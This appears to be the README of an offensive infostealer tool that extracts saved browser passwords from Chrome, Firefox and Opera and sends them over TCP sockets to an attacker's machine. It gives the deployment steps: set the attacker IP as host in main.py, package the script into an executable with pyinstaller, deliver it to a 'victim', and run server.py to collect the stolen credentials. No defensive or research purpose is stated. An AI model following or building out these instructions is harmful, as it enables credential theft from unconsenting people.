Extract saved passwords of the browsers (i.e Chrome, Firefox, Opera) in the form of .db files and transfer them to the attacker via sockets
Basically when u send the file to the victim's computer it processes the system information (OS name) and then it searches for the path to the saved credentials of the browser (look into the code for more info) after that it extracts the data in a .db format and sends it to the attacker via TCP.
Put the ip address to your machine in main.py on line 82
host = "<Your_IP>"
Convert the main.py to .exe or a linux binary executable using pyinstaller
pyinstaller --path <Path to Python>\Python\Lib\site-packages\pywin32_system32 --onefile main.py
Then send it to the victim and run the server.py inside the sockets folder
python3 server.py
and wait for the magic to happen
Make sure to install the requirements before converting it to .exe or else the conversion will fail
pip install -r requirements.txt
- Firefox Pass Extraction - unode (https://github.com/unode/firefox_decrypt/blob/master/firefox_decrypt.py)
- Chrome Pass Extraction - Stackoverflow (https://stackoverflow.com/questions/61099492/chrome-80-password-file-decryption-in-python)